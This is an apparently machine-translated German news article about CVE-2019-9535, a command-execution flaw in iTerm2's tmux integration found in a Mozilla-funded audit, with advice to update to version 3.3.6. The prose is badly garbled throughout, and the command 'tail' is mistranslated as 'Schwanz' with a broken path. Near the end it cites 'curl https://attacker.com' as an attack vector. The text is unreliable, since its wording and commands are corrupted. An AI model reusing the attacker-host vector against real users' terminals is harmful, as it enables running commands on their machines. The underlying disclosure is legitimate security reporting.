iTerm2, ein bekannter Open-Source-Terminal-Emulator macOS app, wurde verwundbar gefunden kritische Fehler e, von dem bekannt ist als CVE-2019-9535.
Der Fehler wurde bei einer Prüfung gesponsert von Mozilla entdeckt, das Unternehmen hinter dem Firefox-Browser. Wie zum Zweck der iTerm2, die Anwendung ist nahezu identisch mit dem nativen Terminal-macOS App, und ist ein Ersatz für das Terminal und der Nachfolger iTerm.
CVE-2019-9535 – Eine kritische Sicherheitslücke in iTerm2
Eine Sicherheitsüberprüfung durch das Open-Source-Support-Programm Mozilla finanziert (MOOS) hat eine kritische Sicherheitslücke in dem weit verbreiteten macOS Terminal-Emulator entdeckt iTerm2. Nach der Verwundbarkeit finden, Mozilla, Radically Offene Sicherheits (ROS, die Firma, die die Prüfung durchgeführt), und iTerm2 Entwickler George Nachman arbeiteten eng zusammen zu entwickeln und veröffentlichen einen Patch Benutzer, um sicherzustellen, nicht mehr Gegenstand dieser Sicherheitsbedrohung, sagte Mozillas Tom Ritter in einem Blog-Post Detaillierung das Thema.
Die Sicherheitslücke wurde in der tmux Integrationsfunktion von iTerm2 entdeckt. Das Schlimmste ist, dass er zumindest hat es 7 Jahre. Es sei darauf hingewiesen, dass die Frage nicht so einfach sein kann, zu nutzen, wie es Benutzer interact erfordert. Dennoch, die Tatsache, dass es durch Befehle ausgenutzt werden kann, macht es gefährlich genug.
Zusamenfassend, CVE-2019-9535 ist ein ernstes Sicherheitsproblem angesehen, da sie ein Angreifer Befehle auf dem Rechner eines Benutzers auszuführen, wenn sie eine Datei oder Empfangen von Eingabe sehen in iTerm2 gefertigt.
Alle Nutzer, wie Entwickler und Administratoren, von iTerm2 sind aufgefordert, Update so schnell wie möglich auf die neueste Version der App (3.3.6).
Nach Ritter, “ein Angreifer, der Ausgang an das Terminal erzeugen kann, kann, in vielen Fällen, Ausführen von Befehlen auf dem Computer des Benutzers.” Angriffsvektoren für einen Angreifer gesteuerte SSH-Server oder Befehle wie curl umfassen Verbindungs https://attacker.com und Schwanz -f / var / log / apache2 / referer_log. Wir erwarten, dass die Gemeinschaft wird noch viele weitere kreative Beispiele finden, die Forscher hinzugefügt.
Der Patch sollte sofort angewendet werden, wie es in unbekannter Weise genutzt werden, Forscher warnen.